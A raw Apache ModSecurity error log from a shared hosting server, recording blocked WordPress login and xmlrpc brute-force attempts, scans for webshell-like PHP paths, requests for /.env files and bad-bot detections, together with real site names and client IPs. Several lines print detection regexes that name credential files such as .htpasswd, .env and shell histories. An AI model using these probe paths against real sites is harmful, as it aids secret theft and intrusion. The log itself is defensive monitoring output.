[Tue May 26 13:33:59.411688 2026] [security2:error] [pid 512344:tid 512565] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT7sbElyei4S77DQcTXwAAAFs"]
[Tue May 26 13:34:01.338573 2026] [security2:error] [pid 512344:tid 512560] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT8MbElyei4S77DQcTigAAAFY"]
[Tue May 26 13:34:03.722101 2026] [security2:error] [pid 512344:tid 512494] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT88bElyei4S77DQcTzAAAABQ"]
[Tue May 26 13:34:05.647961 2026] [security2:error] [pid 512344:tid 512562] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT9cbElyei4S77DQcUAAAAAFg"]
[Tue May 26 13:34:07.236288 2026] [security2:error] [pid 512344:tid 512363] [remote 46.101.75.237:49826] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "rohiniventures.com"] [uri "/wp-login.php"] [unique_id "ahVT98bElyei4S77DQcUNAAAGBI"]
[Tue May 26 13:34:07.711058 2026] [security2:error] [pid 512344:tid 512515] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT98bElyei4S77DQcUNwAAACk"]
[Tue May 26 13:34:09.931651 2026] [security2:error] [pid 512344:tid 512533] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT-cbElyei4S77DQcUhgAAADs"]
[Tue May 26 13:34:11.459938 2026] [security2:error] [pid 512344:tid 512390] [remote 31.24.44.107:45296] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.44.24.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVT-8bElyei4S77DQcUugAAFy0"]
[Tue May 26 13:34:12.018680 2026] [security2:error] [pid 512344:tid 512557] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT-8bElyei4S77DQcUyQAAAFM"]
[Tue May 26 13:34:14.133020 2026] [security2:error] [pid 512344:tid 512521] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT_cbElyei4S77DQcVCQAAAC8"]
[Tue May 26 13:34:14.348012 2026] [security2:error] [pid 512344:tid 512536] [client 115.98.9.72:61881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 72.9.98.115.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kexcouriers.com"] [uri "/xmlrpc.php"] [unique_id "ahVT_sbElyei4S77DQcVEwAAAD4"]
[Tue May 26 13:34:14.348259 2026] [security2:error] [pid 512344:tid 512536] [client 115.98.9.72:61881] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "kexcouriers.com"] [uri "/xmlrpc.php"] [unique_id "ahVT_sbElyei4S77DQcVEwAAAD4"]
[Tue May 26 13:34:15.782688 2026] [security2:error] [pid 512344:tid 512590] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVT_8bElyei4S77DQcVMgAAAHQ"]
[Tue May 26 13:34:16.173134 2026] [security2:error] [pid 512344:tid 512398] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUAMbElyei4S77DQcVTAAADDU"]
[Tue May 26 13:34:16.173402 2026] [security2:error] [pid 512344:tid 512486] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVUAMbElyei4S77DQcVTAAADDU"]
[Tue May 26 13:34:17.899563 2026] [security2:error] [pid 512344:tid 512601] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUAcbElyei4S77DQcViAAAAH8"]
[Tue May 26 13:34:17.951803 2026] [security2:error] [pid 512344:tid 512546] [client 74.7.244.36:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVUAcbElyei4S77DQcVfgAAAEg"]
[Tue May 26 13:34:17.953048 2026] [security2:error] [pid 512344:tid 512574] [client 74.7.244.36:49576] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahVUAcbElyei4S77DQcVfAAAZDw"]
[Tue May 26 13:34:18.659684 2026] [security2:error] [pid 512344:tid 512482] [client 74.7.230.10:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "me.moes-art.com"] [uri "/index.php"] [unique_id "ahVUAcbElyei4S77DQcVewAAAAg"]
[Tue May 26 13:34:18.660526 2026] [security2:error] [pid 512344:tid 512487] [client 74.7.230.10:33462] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "me.moes-art.com"] [uri "/robots.txt"] [unique_id "ahVUAcbElyei4S77DQcVeAAADVs"]
[Tue May 26 13:34:18.848715 2026] [security2:error] [pid 512344:tid 512485] [client 74.7.230.1:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.moes-art.com"] [uri "/index.php"] [unique_id "ahVUAsbElyei4S77DQcVuQAAAAs"]
[Tue May 26 13:34:18.848753 2026] [security2:error] [pid 512344:tid 512485] [client 74.7.230.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.moes-art.com"] [uri "/index.php"] [unique_id "ahVUAsbElyei4S77DQcVuQAAAAs"]
[Tue May 26 13:34:18.849210 2026] [security2:error] [pid 512344:tid 512530] [client 74.7.230.1:40142] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "301"] [hostname "www.moes-art.com"] [uri "/robots.txt"] [unique_id "ahVUAsbElyei4S77DQcVtwAAADg"]
[Tue May 26 13:34:19.213427 2026] [security2:error] [pid 512344:tid 512577] [client 74.7.230.1:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "moes-art.com"] [uri "/index.php"] [unique_id "ahVUA8bElyei4S77DQcVywAAAGc"], referer: http://www.moes-art.com/robots.txt
[Tue May 26 13:34:19.223349 2026] [security2:error] [pid 512344:tid 512543] [client 74.7.230.1:40152] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "moes-art.com"] [uri "/robots.txt"] [unique_id "ahVUA8bElyei4S77DQcVyQAAAEU"], referer: http://www.moes-art.com/robots.txt
[Tue May 26 13:34:19.853761 2026] [security2:error] [pid 512344:tid 512514] [client 177.245.55.224:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUA8bElyei4S77DQcV2QAAACg"]
[Tue May 26 13:34:20.010569 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUA8bElyei4S77DQcV4gAAAGY"]
[Tue May 26 13:34:21.623617 2026] [security2:error] [pid 512344:tid 512591] [client 114.119.129.198:63827] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "moneyapp.com.co"] [uri "/component/comprofiler/login"] [unique_id "ahVUBcbElyei4S77DQcWLgAAAHU"], referer: https://moneyapp.com.co/registro-personas
[Tue May 26 13:34:22.135273 2026] [security2:error] [pid 512344:tid 512597] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUBcbElyei4S77DQcWNgAAAHs"]
[Tue May 26 13:34:23.934213 2026] [security2:error] [pid 512344:tid 512463] [remote 74.7.241.58:38046] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.241.7.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahVUB8bElyei4S77DQcWfwAABnY"], referer: https://www.billing.mosykay.com/app/password/reset?path=/home1/taote1zo/public_html/mosykay.com/wp-content/plugins/wpforms-lite/templates/admin/splash
[Tue May 26 13:34:24.017642 2026] [security2:error] [pid 512344:tid 512507] [client 194.26.192.17:61881] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/fix/up.php"] [unique_id "ahVUB8bElyei4S77DQcWggAAACE"]
[Tue May 26 13:34:24.020837 2026] [security2:error] [pid 512344:tid 512573] [client 194.26.192.17:61877] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVUB8bElyei4S77DQcWhAAAAGM"], referer: www.google.com
[Tue May 26 13:34:24.032059 2026] [security2:error] [pid 512344:tid 512516] [client 194.26.192.17:61878] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-plain.php"] [unique_id "ahVUB8bElyei4S77DQcWgwAAACo"], referer: www.google.com
[Tue May 26 13:34:24.298406 2026] [security2:error] [pid 512344:tid 512549] [client 194.26.192.17:64424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/apikey/apikey.php"] [unique_id "ahVUCMbElyei4S77DQcWmAAAAEs"]
[Tue May 26 13:34:24.336288 2026] [security2:error] [pid 512344:tid 512584] [client 194.26.192.17:51879] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wldvxheh.php"] [unique_id "ahVUCMbElyei4S77DQcWmQAAAG4"], referer: www.google.com
[Tue May 26 13:34:24.483294 2026] [security2:error] [pid 512344:tid 512599] [client 194.26.192.17:62693] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/themes/seotheme/db.php"] [unique_id "ahVUCMbElyei4S77DQcWoQAAAH0"], referer: www.google.com
[Tue May 26 13:34:24.591598 2026] [security2:error] [pid 512344:tid 512550] [client 194.26.192.17:50141] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/plugins/content/apismtp/apismtp.php"] [unique_id "ahVUCMbElyei4S77DQcWpQAAAEw"]
[Tue May 26 13:34:24.801207 2026] [security2:error] [pid 512344:tid 512526] [client 194.26.192.17:53372] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-plain.php"] [unique_id "ahVUCMbElyei4S77DQcWrAAAADQ"], referer: www.google.com
[Tue May 26 13:34:24.892973 2026] [security2:error] [pid 512344:tid 512591] [client 194.26.192.17:55775] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/wp-content/plugins/apikey/apikey.php.suspected"] [unique_id "ahVUCMbElyei4S77DQcWsAAAAHU"]
[Tue May 26 13:34:24.901325 2026] [security2:error] [pid 512344:tid 512502] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUCMbElyei4S77DQcWngAAABw"]
[Tue May 26 13:34:25.319391 2026] [security2:error] [pid 512344:tid 512530] [client 194.26.192.17:59920] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/plugins/content/apismtp/apismtp.php.suspected"] [unique_id "ahVUCcbElyei4S77DQcWxwAAADg"]
[Tue May 26 13:34:25.407551 2026] [security2:error] [pid 512344:tid 512587] [client 194.26.192.17:62847] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 17.192.26.194.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "cicodev.org"] [uri "/mklcrigt.php"] [unique_id "ahVUCcbElyei4S77DQcWygAAAHE"], referer: www.google.com
[Tue May 26 13:34:26.046475 2026] [security2:error] [pid 512344:tid 512501] [client 34.73.22.233:64861] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.22.73.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVUCcbElyei4S77DQcW4gAAABs"]
[Tue May 26 13:34:26.046572 2026] [security2:error] [pid 512344:tid 512501] [client 34.73.22.233:64861] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVUCcbElyei4S77DQcW4gAAABs"]
[Tue May 26 13:34:26.341288 2026] [security2:error] [pid 512344:tid 512502] [client 34.73.22.233:63059] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 233.22.73.34.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVUCsbElyei4S77DQcW8AAAABw"]
[Tue May 26 13:34:26.341475 2026] [security2:error] [pid 512344:tid 512502] [client 34.73.22.233:63059] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVUCsbElyei4S77DQcW8AAAABw"]
[Tue May 26 13:34:27.083781 2026] [security2:error] [pid 512344:tid 512499] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUCsbElyei4S77DQcW-wAAABk"]
[Tue May 26 13:34:27.300553 2026] [security2:error] [pid 512344:tid 512583] [client 106.215.152.177:19658] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 177.152.215.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "koiralalogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahVUC8bElyei4S77DQcXDAAAAG0"]
[Tue May 26 13:34:27.300803 2026] [security2:error] [pid 512344:tid 512583] [client 106.215.152.177:19658] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "koiralalogistics.com"] [uri "/xmlrpc.php"] [unique_id "ahVUC8bElyei4S77DQcXDAAAAG0"]
[Tue May 26 13:34:29.341134 2026] [security2:error] [pid 512344:tid 512563] [client 57.141.2.7:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUDMbElyei4S77DQcXPgAAAFk"]
[Tue May 26 13:34:30.468255 2026] [security2:error] [pid 512344:tid 512565] [client 185.191.171.13:34958] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVUDsbElyei4S77DQcXawAAAFs"]
[Tue May 26 13:34:30.468386 2026] [security2:error] [pid 512344:tid 512565] [client 185.191.171.13:34958] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/3/"] [unique_id "ahVUDsbElyei4S77DQcXawAAAFs"]
[Tue May 26 13:34:31.181502 2026] [autoindex:error] [pid 512344:tid 512528] [client 15.204.183.221:39822] AH01276: Cannot serve directory /home2/jhonwy9v/stvica.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:34:31.420574 2026] [security2:error] [pid 512344:tid 512576] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUD8bElyei4S77DQcXeQAAAGY"]
[Tue May 26 13:34:33.434705 2026] [security2:error] [pid 512344:tid 512528] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUEcbElyei4S77DQcXtwAAADY"]
[Tue May 26 13:34:34.453553 2026] [security2:error] [pid 512344:tid 512388] [remote 138.197.219.126:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 126.219.197.138.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclub.in"] [uri "/wp-login.php"] [unique_id "ahVUEsbElyei4S77DQcX3AAAHCs"]
[Tue May 26 13:34:35.868355 2026] [security2:error] [pid 512344:tid 512554] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUE8bElyei4S77DQcX9wAAAFA"]
[Tue May 26 13:34:37.470502 2026] [security2:error] [pid 512344:tid 512548] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUFcbElyei4S77DQcYJAAAAEo"]
[Tue May 26 13:34:39.065320 2026] [security2:error] [pid 512344:tid 512416] [remote 46.101.75.237:33954] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 237.75.101.46.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "nicmaperu.com"] [uri "/wp-login.php"] [unique_id "ahVUFsbElyei4S77DQcYTwAAb0c"]
[Tue May 26 13:34:39.366611 2026] [security2:error] [pid 512344:tid 512504] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUFsbElyei4S77DQcYVQAAAB4"]
[Tue May 26 13:34:40.393582 2026] [security2:error] [pid 512344:tid 512578] [client 141.98.11.171:41937] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.wrapmachines.com"] [uri "/.env"] [unique_id "ahVUGMbElyei4S77DQcYdgAAAGg"]
[Tue May 26 13:34:41.059799 2026] [security2:error] [pid 512344:tid 512529] [client 141.98.11.171:43512] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "new.wrapmachines.com"] [uri "/.env"] [unique_id "ahVUGcbElyei4S77DQcYjQAAADc"]
[Tue May 26 13:34:41.476279 2026] [security2:error] [pid 512344:tid 512496] [client 109.230.202.240:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVUGcbElyei4S77DQcYjAAAABY"]
